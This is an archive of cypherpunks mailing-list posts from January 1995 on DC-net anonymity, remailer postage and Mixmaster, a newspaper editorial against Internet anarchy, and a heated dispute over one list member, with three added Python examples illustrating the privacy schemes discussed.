years (in prototype), so I sure hope anonymous A/V is not that far off.

I know, I know, the market will decide...  But second guessing the market 
can be fun and sometimes profitable.  Just look at all those people 
trying to make money on the stock market.

Sorry if I'm hammering the subject to death...

Wei Dai







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 7 Jan 95 18:40:47 PST
To: cypherpunks@toad.com
Subject: Re: Latency Costs of Anonymity
Message-ID: <199501080241.SAA13329@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Wei Dai <weidai@eskimo.com>
> [My idea for ATM mixes]
> The problem here is that you'll have to do an RSA operation on EACH 
> packet.  Pretty hard on the CPU...

Yes, good point.  It might be possible to use a stream model where the
separate packets which make up a stream use the same conventional key.
This allows the various packets which make up a stream to be identified
as such by outsiders, but still if there are a large number of virtual
streams going through the network at one time it should be possible to
confuse the streams pretty well.  ("I've got a crazy idea.  Let's cross
the streams!" -- Ghostbusters).  Then you only need to do the RSA work
at setup time, and you need a fast streaming cypher during the
conversation.  This is how the streaming-packet encryption models like
IPSP or Netscape's SSL seem to work.

> > I think it may be more useful rather than speaking of "true" anonymity
> > to think of factor-of-N anonymity.  This reflects the bandwidth costs.  I
> > would guess that, if you have a packet-based video conferencing system,
> > that today you could probably get factor-of-2 anonymity with custom
> > hardware, and perhaps even more than that.
> 
> I'm not exactly sure what you mean by "factor-of-N".  I only used "true" 
> to distinguish it from "trivial" anonymity (such as using a pay phone).  
> Of course, anonymity, like security, can only be relative.

By "factor-of-N" I meant anonymity where you can only pin the source of
a message down to one of N possibilities.  It appears to me that many
of the costs will be a function of N.  It will be relatively easier to
cloak your source as one of say 50 possibilities than to make it any of
one in a million.  This is why I suggested that factor-of-2 anonymity
would be the easiest.  The DC-Net concept would allow two users to
share a cryptographically strong pseudo-random stream, and each of them
to XOR their video output with the random stream; then these modified
outputs from each of them are themselves XOR'd together to produce the
joint output.  As long as only one sends at a time, the resulting
stream is their output, but it is impossible for an outsider to
determine which one is sending.  The hardware requirements seem quite
modest and perhaps would be adequate today even for video.

> [My points about limitations on suitability of anonymity]
> 
> This is all very true.  I guess I'm just lamenting the loss of my earlier,
> more naive dream that one day everyone will be anonymous (read
> pseudonymous), and that physical and digital identities will be totally
> separate. 

I don't think we would really expect everyone to be anonymous all of the
time.  In our personal lives, with friends and family, it doesn't seem
appropriate to expect anonymity (although my earlier quotes from Greg
Bear's sci fi story suggest differently).  But still I think that for
people who desire it and are willing to pay the prices, anonymity would
indeed be available in many or most electronic communications.  So if
that is your desire you should be able to achieve it.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLw9Q1xnMLJtOy9MBAQEhPwH+KSYD4KhA1HOUxqOzdb2WdMuq0i1XTFzH
fKMnejTqlKVbFfEnQqfHukwKpH5nFpuN7towJ1o98aGqT1ACxbSjpQ==
=2mxw
-----END PGP SIGNATURE-----
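
The DC-Net arrangement Hal describes above, as an added Python example that is not part of the original message: each participant publishes the XOR of the streams it shares with its peers (plus its message when sending), and XORing all published outputs recovers the message. It generalizes the two-user case to N participants with pairwise keys; the HMAC-SHA256 stream generator, the key derivation and all names are assumptions, and the sample frame is constructed.

```python
import hashlib
import hmac
from itertools import combinations


def keystream(key: bytes, round_no: int, length: int) -> bytes:
    """Pseudo-random bytes for one round, derived from a shared key.

    HMAC-SHA256 in counter mode is an assumption standing in for the
    "cryptographically strong pseudo-random stream" of the message.
    """
    out = b""
    counter = 0
    while len(out) < length:
        block = round_no.to_bytes(8, "big") + counter.to_bytes(8, "big")
        out += hmac.new(key, block, hashlib.sha256).digest()
        counter += 1
    return out[:length]


def xor(a: bytes, b: bytes) -> bytes:
    if len(a) != len(b):
        raise ValueError("XOR operands must have equal length")
    return bytes(x ^ y for x, y in zip(a, b))


def make_pair_keys(names):
    """Constructed demo keys, one per unordered pair of participants."""
    keys = {}
    for a, b in combinations(sorted(names), 2):
        label = f"constructed-demo-key:{a}|{b}".encode()
        keys[frozenset((a, b))] = hashlib.sha256(label).digest()
    return keys


def participant_output(name, pair_keys, round_no, length, message=None):
    """Bytes one participant publishes in a round."""
    if message is not None and len(message) > length:
        raise ValueError("message longer than the round's slot")
    # An idle participant contributes zeros; a sender contributes the message.
    out = bytes(length) if message is None else message.ljust(length, b"\0")
    for pair, key in pair_keys.items():
        if name in pair:
            out = xor(out, keystream(key, round_no, length))
    return out


def run_round(names, pair_keys, round_no, length, sending):
    """Return (published outputs by name, joint output) for one round.

    `sending` maps a participant name to the bytes it transmits this round.
    """
    outputs = {
        n: participant_output(n, pair_keys, round_no, length, sending.get(n))
        for n in names
    }
    joint = bytes(length)
    for out in outputs.values():
        joint = xor(joint, out)  # each pairwise stream appears twice and cancels
    return outputs, joint


def pad_consistent_with(outputs, assumed_sender):
    """Two-party case: the pad an outsider must assume if `assumed_sender` sent.

    It is simply the other party's published output, so both guesses explain
    the transcript equally well unless the shared stream can be predicted.
    """
    (other,) = [n for n in outputs if n != assumed_sender]
    return outputs[other]


if __name__ == "__main__":
    names = ["alice", "bob"]
    keys = make_pair_keys(names)
    frame = b"video frame 0001"  # constructed sample payload
    outputs, joint = run_round(names, keys, 0, len(frame), {"alice": frame})
    print("joint output:", joint)
    for guess in names:
        pad = pad_consistent_with(outputs, guess)
        print(guess, "fits as sender:", xor(outputs[guess], pad) == joint)
```

If two participants send in the same round, the joint output is the XOR of both messages, which is why the message requires that only one sends at a time.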




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: klp@epx.cis.umn.edu
Date: Sat, 7 Jan 95 17:50:26 PST
To: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Subject: Re: Carol Anne Whoever
In-Reply-To: <ab33c51401021004a87a@[132.162.201.201]>
Message-ID: <0012f0f4513022117@epx.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


According to legend, Jonathan Rochkind said:
> [I'm beginning to suspect that Carol Anne, and her sysadmin too, are just
> tentacles of Detweiler.]
Actually (unfortunately?) I can confirm the fact that Carol Anne, and
Mike are >not< Detweiler, CA by personal knowledge, and Mike by
reputation. Just thought I'd toss that out for the viewing public,
and go back to my 'no comment' stance on the whole rest of the 
deal...

-- 
Kevin Prigge                         internet: klp@epx.cis.umn.edu
CIS Consultant                      MaBellNet: (612)626-0001
Computer & Information Services    SneakerNet: 152 Lauderdale




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Sat, 7 Jan 95 19:44:19 PST
To: m00012@KANGA.STCLOUD.MSUS.EDU
Subject: Re: carrol(
In-Reply-To: <0098A1FE.894B5380.788@KANGA.STCLOUD.MSUS.EDU>
Message-ID: <199501080230.UAA00614@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> 
> What is wrong with this person?
> 
> ban her if you can, that's my opinion.
> 
Hi all,

For what it is worth, I oppose banning in any manner, shape, or form. There
is no moral or ethical justification for it.

Take care.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Fletcher <jonathon@izanagi.sbi.com>
Date: Sat, 7 Jan 95 03:58:33 PST
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <Pine.SUN.3.91.950107205847.20579A-100000@doe174g>
MIME-Version: 1.0
Content-Type: text/plain


who cypherpunks
end





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Fletcher <jonathon@izanagi.sbi.com>
Date: Sat, 7 Jan 95 04:26:04 PST
To: cypherpunks@toad.com
Subject: Re: your mail
Message-ID: <Pine.SUN.3.91.950107212620.20579H-100000@doe174g>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 7 Jan 1995, Jonathon Fletcher wrote:
> who cypherpunks
> end

I know, I know. I'm sorry. I'll send it to the right place next time.
Small slip of the qwertys

-Jon

--
  Jonathon Fletcher,
  jonathon@japan.sbi.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m00012@KANGA.STCLOUD.MSUS.EDU
Date: Sat, 7 Jan 95 19:30:25 PST
To: cypherpunks@toad.com
Subject: carrol(
Message-ID: <0098A1FE.894B5380.788@KANGA.STCLOUD.MSUS.EDU>
MIME-Version: 1.0
Content-Type: text/plain



What is wrong with this person?

ban her if you can, that's my opinion.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mikepb@freke.lerctr.org (Michael P. Brininstool)
Date: Sat, 7 Jan 95 14:09:35 PST
Subject: Re: SAN FRANCISCO EDITORIAL
In-Reply-To: <Pine.SUN.3.91.950103102549.18076G-100000@crl.crl.com>
Message-ID: <1995Jan7.134217.22470@freke.lerctr.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.SUN.3.91.950103102549.18076G-100000@crl.crl.com> sandfort@crl.com (Sandy Sandfort) writes:
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
>C'punks,
>
>Here is a guest editorial that ran in Monday's SF Chronicle.  It
>should make your blood boil.

Is anyone going to write rebuttals?  Would the SF Chronicle print them?  As
I read this, I only saw the following propaganda:

>             ANARCHY, CHAOS ON THE INTERNET MUST END

in Cyberspace, there is not much order. It is governed by no one.
... being left to the equivalent of mob rule.
the need for firm direction is all too obvious.
... unregulated broadcasting ..., sexual harassment, profanity, defamation,
forgery and fraud ... secretiveness is why abuse is easy.
problems are further exacerbated by Anonymous Server, which launders
computer messages, like money is laundered.
... difficulties in commercialization.
turf war rages between factions ...
attacks on business people ... vandalism, persist uncontrolled.
Worst of all are the ``canceller robots,'' ... the communications
the hackers wish to silence.
vigilantes routinely challenge free speech unabated ...
access providers, assume the role of censors, arbitrarily
closing accounts of those whom they disapprove.
one obvious way to bring much needed order, is through diplomacy.
The United States should lead in this.
... urge the Finnish government to deactivate the Anonymous Server.
establish a standard of recognizing laws existing at the point of
origin as controlling the message sender.
When conflicts arise, governmental diplomacy should again be the answer,
just as it is with other trade and communications issues.  Next, laws
already regulating behavior in the real world should be applied in
Cyberspace.  The Supreme Court should act ...  stating that crime is
crime, even when the criminal instrument is a computer keyboard.
legislation should be passed making access providers common carriers.
This will get them and under the guiding hand of the FCC ...
People need safety and order in Cyberspace just as they do in their homes
and on the streets.
The current state makes it clear that anarchy isn't working.
If governments don't bring order, chaos may soon dictate.


!@&^%&^!%@&$^%&^@%$&^!@$  I wish I could write worth beans.  I have never
been published in any newspaper, anywhere.  They never like my rebuttals.  I
guess I get too rabid when I write.

- ---------------------------------------------------------|
| #include "std/disclaimer.h"     Michael P. Brininstool |
| mikepb@freke.lerctr.org      OR      mikepb@netcom.com |
|---------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.9 alpha I - BACK UP YOUR KEYRING BEFORE USE

iQCVAgUBLw8KT1gtYer4uLCdAQFLnQP/ZxwEsLtssYkk7F58v/ITcj9dx/Utyl4m
RzIdsgdg98h0c0WzDsXm2ZxKOK7rcucSMx+UF94jc0qVyTLk3T13Hm1n86WRJHSL
6vDdKiKP50WqjHg+1cBSMs9DOer/Q2wOCznMPK8LobYLII43YY2cvWhCt8JSC8o+
QpVkdv7IRqA=
=b3pW
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Sat, 7 Jan 95 22:13:50 PST
To: Carol Anne Braddock <carolann@mm.com>
Subject: Re: From me to me to you...The Actual Article
In-Reply-To: <Pine.3.89.9501070130.A14788-0100000@downburst.mm.com>
Message-ID: <Pine.3.89.9501072224.A18002-0100000@netcom18>
MIME-Version: 1.0
Content-Type: text/plain


The world is full of self important assholes.   You will go
mad trying to deal with people like him.

Life is too short.  From time to time post messages belittling
him and his service, and get on with a new service.

If you find a reasonably priced 28KB SLIP connection let me know.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.  True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Sat, 7 Jan 95 22:23:30 PST
To: Carol Anne Braddock <carolann@mm.com>
Subject: Re: Big vs Little providers (punkette view)
In-Reply-To: <Pine.3.89.9501070420.H14788-0100000@downburst.mm.com>
Message-ID: <Pine.3.89.9501072255.A18002-0100000@netcom18>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 7 Jan 1995, Carol Anne Braddock wrote:

> Yes, at Netcom, I can now probably get much further, much faster.
> No I wouldn't subject myself or anyone to Winternet. But I wouldn't
> subject a newbie to Netcom either. I did it once and was sorry, too.

Actually you cannot.  No web pages, and their ftp is really bad.

I put my web stuff on http://nw.com/jamesd/

Cheap, good bandwidth, but I have trouble getting usage statistics.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.  True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Sun, 8 Jan 95 13:24:19 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Abuse
In-Reply-To: <199501070554.VAA14679@netcom9.netcom.com>
Message-ID: <DMs3lKJXYvKM075yn@ssnet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


I'm joining this a bit late, but if you take the concept
proposed earlier about sticking a remailer stamp on each
encrypted envelope and that stamp being removed by the
remailer, each remailer will get paid for handling the
message.

The anonymity (assuming an FV-type postage sale) can be
restored by having one or more trusted postage exchanges.

You buy a hundred stamps, send them to the exchange, and
get back ninety-nine stamps from a pool.  You now have a
valid remailer stamp that does not have a link to you.

Of course, to keep the purchasers honest, the stamps should
probably be sent from the purchase point (FV in this example).
And there would also have to be a fast clearing house so
stamps can't be reused/copied.
- --
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Don Melvin                  storm@ssnet.com                finger for PGP key.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLw9nAmvyi8p8VUiJAQHAsAQAj+hPIqS8lKFgRSr+m/aqrDp96W/ZTAw6
icQoAserp1gdWeOOaYKVZOgFA4Fn4BRM1ghs6mKO9nInVqJf9rCLpPhRCQ7ABPUi
lR9mHq4ib4wA7cWzpraXy+Bf6eht0DaPHO8aUFW1Hz8wDGLjtamzrknjhnUGyS1Z
LaKifu4R2o8=
=NXlf
-----END PGP SIGNATURE-----
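
The stamp exchange and clearing house sketched in the message above, as an added Python example that is not part of the original message. The class names, random serial numbers as stamps and the draw-before-deposit rule are assumptions; the earlier purchasers that seed the pool are constructed.

```python
import random
import secrets


class StampSeller:
    """The purchase point (FV in the message): knows who paid for each stamp."""

    def __init__(self):
        self.sold_to = {}  # serial -> purchaser identity

    def issue(self, purchaser, count):
        stamps = [secrets.token_hex(16) for _ in range(count)]
        for serial in stamps:
            self.sold_to[serial] = purchaser
        return stamps

    def is_genuine(self, serial):
        return serial in self.sold_to


class PostageExchange:
    """Trusted exchange: swaps incoming stamps for older ones from its pool."""

    FEE = 1  # 100 stamps in, 99 out, as in the message

    def __init__(self, rng=None):
        self.pool = []
        self.rng = rng or random.SystemRandom()

    def swap(self, incoming):
        wanted = len(incoming) - self.FEE
        if wanted <= 0:
            raise ValueError("not enough stamps to cover the fee")
        if wanted > len(self.pool):
            # Too few stamps from other purchasers to hide among.
            raise ValueError("pool too small to unlink this purchase")
        self.rng.shuffle(self.pool)
        outgoing = [self.pool.pop() for _ in range(wanted)]
        # Deposit only after drawing, so nobody gets their own stamps back.
        self.pool.extend(incoming)
        return outgoing


class ClearingHouse:
    """Online check a remailer makes before accepting a stamp."""

    def __init__(self, seller):
        self.seller = seller
        self.spent = set()

    def redeem(self, serial):
        if not self.seller.is_genuine(serial):
            return "unknown"
        if serial in self.spent:
            return "already-spent"
        self.spent.add(serial)
        return "ok"


def buy_unlinked_stamps(seller, exchange, purchaser, count=100):
    """The seller ships stamps straight to the exchange, so the purchaser
    never holds (and cannot copy) the serials the seller can link to them."""
    return exchange.swap(seller.issue(purchaser, count))


if __name__ == "__main__":
    seller = StampSeller()
    exchange = PostageExchange()
    for earlier in ("constructed-user-1", "constructed-user-2"):
        exchange.pool.extend(seller.issue(earlier, 100))
    stamps = buy_unlinked_stamps(seller, exchange, "alice")
    house = ClearingHouse(seller)
    print(len(stamps), "stamps received")
    print("seller's record for first stamp:", seller.sold_to[stamps[0]])
    print("first use:", house.redeem(stamps[0]))
    print("second use:", house.redeem(stamps[0]))
```

The unlinking holds only against the seller's records; an exchange that logs which stamps it handed to whom can rebuild the link, which is why the message asks for trusted exchanges.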




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m00012@KANGA.STCLOUD.MSUS.EDU
Date: Sat, 7 Jan 95 21:17:19 PST
To: nelson@crynwr.com
Subject: Re: carrol(
Message-ID: <0098A20D.79070F00.2@KANGA.STCLOUD.MSUS.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I would put her in my killfile, but I don't know if vms has a kill
file capability.  I use my unix accounts for important email, and
do not want to have to sift through the volume I get from the cypherpunks.

Otherwise, given that the percentage of interesting posts is going down
as a result of carrolann (and perhaps me too now), I think having an
elite group capable of banning certain people is perfectly ethical.

mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Sat, 7 Jan 95 20:19:31 PST
To: m00012@KANGA.STCLOUD.MSUS.EDU
Subject: Re: carrol(
In-Reply-To: <0098A1FE.894B5380.788@KANGA.STCLOUD.MSUS.EDU>
Message-ID: <m0rQpCA-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Sat, 07 Jan 1995 21:31:45 CST
   From: m00012@KANGA.STCLOUD.MSUS.EDU


   What is wrong with this person?

   ban her if you can, that's my opinion.

Gee, I don't know what everyone is complaining about, because I have:

	if (from = "carolann@mm.com") then delete

in my ~/.elm/filter-rules file.  I highly encourage everyone to have
their own mail filters, because then you don't have to convince anyone
to ban anyone, you just do your own banning.

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Sat, 7 Jan 95 20:53:29 PST
To: "L. Todd Masco" <cypherpunks@toad.com
Subject: Re: Too Much!
Message-ID: <9501080445.AA23191@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:16 AM 1/7/95 -0500, L. Todd Masco wrote:
>You might want to try reading it from NNTP, via c2.org or hks.net.  You
>can then use Kill files.

At that point, isn't the mailing list simply becoming a newsgroup?  For that 
matter, is there some reason that escapes me why it ISN'T a newsgroup?  I 
suppose the proportion of net.kooks is higher in a newsgroup than a mailing 
list, but arguably we're ALL net.kooks here.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Sat, 7 Jan 95 20:53:49 PST
To: Carol Anne Braddock  <carolann@mm.com>
Subject: Re: Soapbox mode on!(but short)
Message-ID: <9501080445.AB23191@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:22 AM 1/7/95, Carol Anne Braddock wrote:
>Dear Paul J. Ste. Marie,
>
>I was quietly going through my mail after an eight hour layoff.
>The first thing you do is lie.
>
>I have called you a liar. Point Blank!
>
>And for the honor of this very list, so that there is some
>credibility, I shall retrieve from a tin reader the actual
>posting, COMPLETE WITH HEADER.  

Interesting.  You did retrieve the message I posted, but not the article 
from alt.current-events.net-abuse.  If you want to call me a liar, that's 
fine, but post something with some relevance.  I'm not in the habit of 
scanning the news hierarchy for spam, and I'm perfectly willing to believe 
you stopped after ten groups, but that isn't what I recalled seeing in 
a.c-e.n-a.  I could be remembering things wrong, but if that is the case, 
kindly post something that actually shows the discussion in a.c-e.n-a was 
otherwise.

>And what makes creeps like you going is the ability to continue,
>to spread those lies. 

And now you're sounding like Martha Siegel.  My words were:

>> The discussion on alt.current-events.net-abuse seemed to indicate that the 
                                                  ^^^^^^^^^^^^^^^^^^
>> claim of "Just 10" above is a slight understatement.  The newsgroups seem to 
>> have been hit alphabetically, and I believe the total count was in the 
>> hundreds.

Am I remembering a.c-e.n-a inaccurately, or have you simply decided not to 
rebut anything in the forum in which it was presented?  All I suggested is 
that your account bore checking out before people leaped to your defense.  
An unwillingness to have your story verified speaks for itself.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Harvey <warrior@infinet.com>
Date: Sat, 7 Jan 95 20:52:02 PST
To: Russell Nelson <nelson@crynwr.com>
Subject: Re: carrol(
In-Reply-To: <m0rQpCA-0008ZFC@crynwr.crynwr.com>
Message-ID: <Pine.3.89.9501072346.A23518-0100000@rigel>
MIME-Version: 1.0
Content-Type: text/plain



Could you tell me how to do this with Pine?  I would love to know how.

Regards,
Dave

> Gee, I don't know what everyone is complaining about, because I have:
> 
> 	if (from = "carolann@mm.com") then delete
> 
> in my ~/.elm/filter-rules file.  I highly encourage everyone to have
> their own mail filters, because then you don't have to convince anyone
> to ban anyone, you just do your own banning.

___
            /\  PGP the Cutting Edge of Privacy.
/vvvvvvvvvvvv \-----------------------------------\
| WARRIOR   (  |     PGP Key Id 0XC554E447D         > Magnus Frater Videt Tu
`^^^^^^^^^^^^ /===================================/
            \/  Finger for PGP 2.6.2 public Key.

      PGP Fingerprint 15 99 09 6D 11 C8 7C E0  08 C7 E6 95 46 65 FE F0
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
| Dave M. Harvey                                       warrior@infinet.com|
| PO Box 151311              	            dharvey@freenet.columbus.oh.us|
| Columbus, OH 43215-8311    	               fm063@cleveland.freenet.edu|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Sun, 8 Jan 95 00:08:15 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Abuse
Message-ID: <ab354b460302100432ca@[137.110.24.249]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>
>See above. What's the difference between A-->B-->C-->B and A-->B-->C-->D ?
>If someone is logging messages and routing, it's less secure, but then so is
>the entire remailer system. Prime remailer operators are those who don't
>log.
>
>Maybe message size would tip off snoopers. This can be overcome with minor
>tweaking to existing remailer code by tacking on or eliminating padding
>to messages. But logging still makes the whole system extremely vulnerable.
>
>=D.C. Williams  <dcwill@ee.unr.edu>
>

Message size can best be handled by using a remailer which uses messages
which never change size. Mixmaster is now ready for testing.
It still does not run on Linux or FreeBSD. I don't know what else it does
run on. It works great on Sun machines with gcc.

Since it is export restricted, send me mail and I will send you the name of
the hidden directory to get the file.
-----BEGIN PGP SIGNATURE-----
Version: 2.6

-----END PGP SIGNATURE-----

--------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Home of "chain" the remailer chaining script.
For anon remailer info, mail remailer@nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
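
Added example, not part of the original message and not Mixmaster's code or packet format: a sketch of the idea in the exchange above, that a remailer handling only constant-size messages gives an observer no size to match between incoming and outgoing traffic. The packet size, header layout and function names are assumptions made for illustration, and the sample messages are constructed.

```python
import os
import struct

# Constructed parameters for illustration; not Mixmaster's real values.
PACKET_SIZE = 1024
HEADER = struct.Struct(">HHH")   # chunk index, chunk count, bytes of real data
PAYLOAD_SIZE = PACKET_SIZE - HEADER.size


def to_packets(message):
    """Split a message into packets that are all exactly PACKET_SIZE bytes.

    Short chunks are filled with random padding. In a real remailer the
    header and payload would sit inside an encrypted layer, so padding and
    data are indistinguishable on the wire; encryption is omitted here.
    """
    chunks = [message[i:i + PAYLOAD_SIZE]
              for i in range(0, len(message), PAYLOAD_SIZE)] or [b""]
    if len(chunks) > 0xFFFF:
        raise ValueError("message too large for this header format")
    packets = []
    for index, chunk in enumerate(chunks):
        padding = os.urandom(PAYLOAD_SIZE - len(chunk))
        packets.append(HEADER.pack(index, len(chunks), len(chunk)) + chunk + padding)
    return packets


def from_packets(packets):
    """Reassemble a message from its packets, in any arrival order."""
    parts = {}
    total = None
    for packet in packets:
        if len(packet) != PACKET_SIZE:
            raise ValueError("packet has the wrong size")
        index, count, used = HEADER.unpack_from(packet)
        if count == 0 or index >= count or used > PAYLOAD_SIZE:
            raise ValueError("malformed header")
        if total is None:
            total = count
        elif count != total:
            raise ValueError("packets belong to different messages")
        parts[index] = packet[HEADER.size:HEADER.size + used]
    if total is None or len(parts) != total:
        raise ValueError("missing packets")
    return b"".join(parts[i] for i in range(total))


def linkable_by_size(incoming_sizes, outgoing_sizes):
    """Return (in_index, out_index) pairs an observer can link by size alone.

    Simplified model of the concern raised above: the remailer reorders
    messages but forwards each one at the size it arrived with. A size
    that occurs once on each side ties that input to that output.
    """
    links = []
    for i, size in enumerate(incoming_sizes):
        if incoming_sizes.count(size) == 1 and outgoing_sizes.count(size) == 1:
            links.append((i, outgoing_sizes.index(size)))
    return links


def demo():
    """Compare naive forwarding with fixed-size packets on constructed input."""
    messages = [b"short note", b"x" * 700, b"y" * 300]   # constructed samples
    reordered = [messages[2], messages[0], messages[1]]  # remailer shuffles

    naive_links = linkable_by_size([len(m) for m in messages],
                                   [len(m) for m in reordered])

    # With fixed-size packets every message above fits in one packet, so
    # the observer sees three identical sizes in and three out.
    padded_in = [len(p) for m in messages for p in to_packets(m)]
    padded_out = [len(p) for m in reordered for p in to_packets(m)]
    padded_links = linkable_by_size(padded_in, padded_out)
    return naive_links, padded_links


if __name__ == "__main__":
    naive, padded = demo()
    print("links with naive forwarding:", naive)
    print("links with fixed-size packets:", padded)
```

Padding hides the length of each packet, not the number of packets: a message that needs several packets still stands out by count unless the remailer also mixes or delays traffic.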






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 7 Jan 95 21:35:12 PST
To: cypherpunks@toad.com
Subject: cipher magazine
Message-ID: <v01510101ab352923d541@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



Someone just gave me this URL. It's probably in the cyphernomicon already,
but I had fun rooting around in here and thought I'd pass it around to
those who haven't seen it yet.


http://www.itd.nrl.navy.mil:80/ITD/5540/ieee/cipher/

Cheers,
Bob Hettinga

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Nelson <a015880t@bcfreenet.seflin.lib.fl.us>
Date: Sat, 7 Jan 95 21:43:02 PST
To: cyper punk <cypherpunks@toad.com>
Subject: how to subscribe
Message-ID: <Pine.3.89.9501080050.I17331-0100000@bcfreenet.seflin.lib.fl.us>
MIME-Version: 1.0
Content-Type: text/plain


can someone please mail me where to post to get subscribed



Jonathan Nelson
a015880t@bcfreenet.seflin.lib.fl.us






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mkj@october.ducktown.org
Date: Sat, 7 Jan 95 23:42:50 PST
To: cypherpunks@toad.com
Subject: The Value of Anonymity
Message-ID: <199501080700.CAA00298@october.ducktown.org>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

The value of anonymity, both on the nets and off, seems to be poorly
understood, even among its strongest defenders.  The positive value of
anonymity is not merely about protecting a few special groups such as
sexual-abuse victims and whistleblowers.  While these are certainly
valuable uses, if I believed that anonymity's positive impact were
limited to these outside-the-mainstream groups, then I probably
wouldn't accept the benefits of anonymity as outweighing its costs.

But in fact, I believe that anonymity has crucially important benefits
for nearly everyone.  There are several good arguments to be made, but
in the interest of brevity I'll focus on only one:

The explosive development of such personal data industries as targeted
marketing and consumer and demographic profiling, have demonstrated
that the business community considers personal data to be of great
economic value.  (There's a parallel observation to be made here about
governments, but I won't go into that now.)  There are also myriad
uses being made of personal data throughout the professions, from
labor negotiators to house burglars.  It is something of a truism that
anyone who knows enough about you can probably find a way to beat you,
either legally or illegally, often at great profit to themselves.

In an information-age society without extremely strong privacy
protections, the chief factor which makes the difference between
winners and losers may be how much information each of us has on
others, and how much they have on us.  Given this degree of economic
and social motivation, it is easy to imagine the sort of panopticon
which will soon arise on the Internet (and its descendants), unless
the strongest possible protections are adopted.  (And it is equally
easy to imagine who the biggest winners and losers will be.)

Relying on government to protect personal privacy is like appointing
the fox to guard the henhouse (or, as I seem to recall John Perry
